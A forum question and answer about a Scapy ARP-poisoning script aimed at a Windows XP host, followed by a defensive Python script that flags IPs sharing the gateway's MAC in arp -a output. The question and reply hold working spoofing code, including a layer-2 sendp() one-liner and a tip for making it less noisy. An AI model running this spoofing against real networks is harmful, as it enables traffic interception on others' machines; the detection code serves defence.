
Scapy arp poisoning not working for me

I am attacking a Windows XP machine with Backtrack 5 using scapy.

Now that's my code:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff")
send(arp_p)

The code above actually sends two packets for some reason. One time my backtrack mac is asking:

who has 192.168.0.106 (Victim's IP) ? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!) .

Then he gets the "is at" answer from the victim.

And the second time my backtrack's mac is asking:

who has 192.168.0.106 (Victim's IP) ? Tell 192.168.0.1 (The router's IP).

Then he gets the "is at" answer from the victim again.

Then the victim's ARP table has two lines with the same MAC but different IPs: one is the Backtrack's real IP and the second is the router's IP.

Why is this happening?

The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send()-ing your ARP packet.

If you don't want that to happen, try (sendp sends at layer 2):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".
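
The symptom described in the question, one MAC address listed against both the router's IP and another host's IP, is what a defender can check for in a host's ARP table. The following is an added example, not code from the original post or from Scapy: it parses `arp -a` output in the Windows layout and reports any IP that shares a MAC with the gateway. The sample table is constructed from the addresses in the question (the third host and its MAC are made up), and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output, built from the addresses in
# the question: the router IP and the sender's real IP both map to one MAC.
SAMPLE_ARP_TABLE = """\
Interface: 192.168.0.106 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-0c-29-f0-2d-19     dynamic
  192.168.0.108         00-0c-29-f0-2d-19     dynamic
  192.168.0.110         00-1b-44-11-3a-b7     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-fA-F]{2}[-:]){5}[0-9a-fA-F]{2})\s+(\w+)",
    re.MULTILINE,
)

def parse_arp_table(text):
    """Return (ip, mac, type) tuples; MACs normalised to lower-case colon form."""
    return [(ip, mac.lower().replace("-", ":"), kind.lower())
            for ip, mac, kind in ENTRY_RE.findall(text)]

def is_group_address(mac):
    """True for broadcast/multicast MACs (I/G bit set in the first octet)."""
    return bool(int(mac[:2], 16) & 1)

def shared_macs(entries):
    """Map each unicast MAC that is listed for more than one IP to those IPs."""
    by_mac = defaultdict(set)
    for ip, mac, _kind in entries:
        if not is_group_address(mac):
            by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_conflicts(entries, gateway_ip):
    """Return, per MAC, the other IPs that share a MAC with the gateway entry."""
    return {mac: [ip for ip in ips if ip != gateway_ip]
            for mac, ips in shared_macs(entries).items() if gateway_ip in ips}

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for mac, ips in gateway_conflicts(table, "192.168.0.1").items():
        print(f"gateway 192.168.0.1 shares {mac} with {ips}")
```

A shared MAC is a signal to investigate rather than proof of spoofing: multi-homed hosts and proxy ARP also produce it, so compare the gateway entry against the router's known hardware address.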
